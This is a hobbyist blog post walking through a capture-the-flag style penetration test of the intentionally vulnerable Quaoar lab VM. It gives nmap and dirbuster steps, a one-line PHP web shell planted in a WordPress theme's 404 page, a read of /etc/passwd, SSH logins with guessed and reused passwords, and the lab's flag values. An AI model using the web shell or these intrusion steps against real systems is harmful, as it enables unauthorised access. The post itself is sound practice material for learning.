WWRDPLDN

This shall be a record of my escapades into the world of ones and zeros.

Quaoar

wwrdpldnadmin | 17 March, 2017 14:05

This is my first public publishing of a pen test. I have been pen testing for about 3 years as a hobby and I enjoy it immensely. I realize that part of pen testing is the ability to write reports that can be handed over to the concerned parties receiving the pen test so I have decided to begin practicing this art. I also decided to start with an easy one so that I could focus on the report and not the actual penetration of the machine.

 

I chose Quaoar for this purpose as it explicitly stated it was easy.

I launched the ova in vmware player and it present me with instructions and the ip address as 192.168.25.137. The first thing I did was launch zenmap,...yes zenmap. I hear you groan. I like gui's,...bite me.

#nmap -T4 -A -v 192.168.255.137

Zenmap spit out the following information:


Discovered open port 110/tcp on 192.168.255.137
Discovered open port 139/tcp on 192.168.255.137
Discovered open port 22/tcp on 192.168.255.137
Discovered open port 995/tcp on 192.168.255.137
Discovered open port 53/tcp on 192.168.255.137
Discovered open port 445/tcp on 192.168.255.137
Discovered open port 143/tcp on 192.168.255.137
Discovered open port 80/tcp on 192.168.255.137
Discovered open port 993/tcp on 192.168.255.137

Since I already know this is supposed to be easy and I wanted to focus on the report I decided to go straight to dirbuster without even opening a webpage.

I ran dirbuster and pointed it to http://192.168.255.137:80 and immediately found wordpress. Now anyone who has ever done anything with wordpress knows that it has always been plagued with vulnerabilities. Again, knowing this is supposed to be easy, I go straight to the login page and find the user/password is set to admin/admin.

A quick google search shows a plethora of easy hacks for authenticated admin privileged wordpress control panels, namely, direct coding of template pages.

 

I navigate to the "twenty thirteen" template page and select the 404.php page. I delete all of the code and paste in

<?php
system($_GET["cmd"]);
?>

I save the page and navigate to it and issue a cat against /etc/passwd

http://192.168.255.137/wordpress/wp-content/themes/twentythirteen/404.php?cmd=cat%20/etc/passwd

/etc/passwd output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
colord:x:104:109:colord colour management daemon,,,:/var/lib/colord:/bin/false
whoopsie:x:105:112::/nonexistent:/bin/false
avahi:x:106:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
bind:x:107:117::/var/cache/bind:/bin/false
postfix:x:108:118::/var/spool/postfix:/bin/false
dovecot:x:109:120:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:110:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:111:121::/var/lib/landscape:/bin/false
libvirt-qemu:x:112:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:113:123:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:115:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
tomcat6:x:116:126::/usr/share/tomcat6:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

I see the only user other than root is wpadmin. I recall SSH was open on port 22. I think about brute forcing wpadmin but I remember, once again, that this is supposed to be easy. So before brute forcing it I ssh as wpadmin.

$ ssh wpadmin@192.168.255.137 using wpadmin as the password.

Success! Wow this one really is easy.

The first flag was in the wpadmin home directory.
$ ls
flag.txt
$ cat flag.txt   
2bafe61f03117ac66a73c3c514de796e

I moved to a bash prompt just to make things easier
$ /bin/bash
#

I verified wpadmin does not have sudo priv so I grab some info on the system.

wpadmin@Quaoar:/$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
wpadmin@Quaoar:/$ cat /proc/version
Linux version 3.2.0-23-generic-pae (buildd@palmer) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012

I tried a couple privilege escalations but the wpadmin user's privileges were too low to execute them. I began searching through folders for anything useful. When I got to the www folder I found a folder called uploads. It had shown up in the dirbuster scan also but I had put it in the back of my mind. I open the folder and I find the config.php file located there. The file has the connection string for the databse and it showing the connection credentials in clear text. The username/password is root/rootpassword! I start wondering about digging through the database but then I realize,..could this actually be the password for the root user?

I ssh'd back into the box:
root@192.168.255.137's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Mar 16 13:25:52 EDT 2017

  System load:  0.01              Processes:             106
  Usage of /:   30.1% of 7.21GB   Users logged in:       1
  Memory usage: 38%               IP address for eth0:   192.168.255.137
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#

Success! Again, Wow, that was easy!


root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Now, there is supposed to be a third flag. I searched for various terms and came up wanting. I wouldn't think this third flag would be hard to find given that everything else has been ridiculously easy. I look through a couple of walkthroughs from others and I see no one else is finding it either, actually only a couple even mention it. I have sent an email asking for verification that there is a third flag. I have not received an answer as of this posting. I will update it if I receive confirmation that it exists and again if I manage to find it.

 

Cheers!

1 2 3 4  Next»
 
Accessible and Valid XHTML 1.0 Strict and CSS
Powered by LifeType - Design by BalearWeb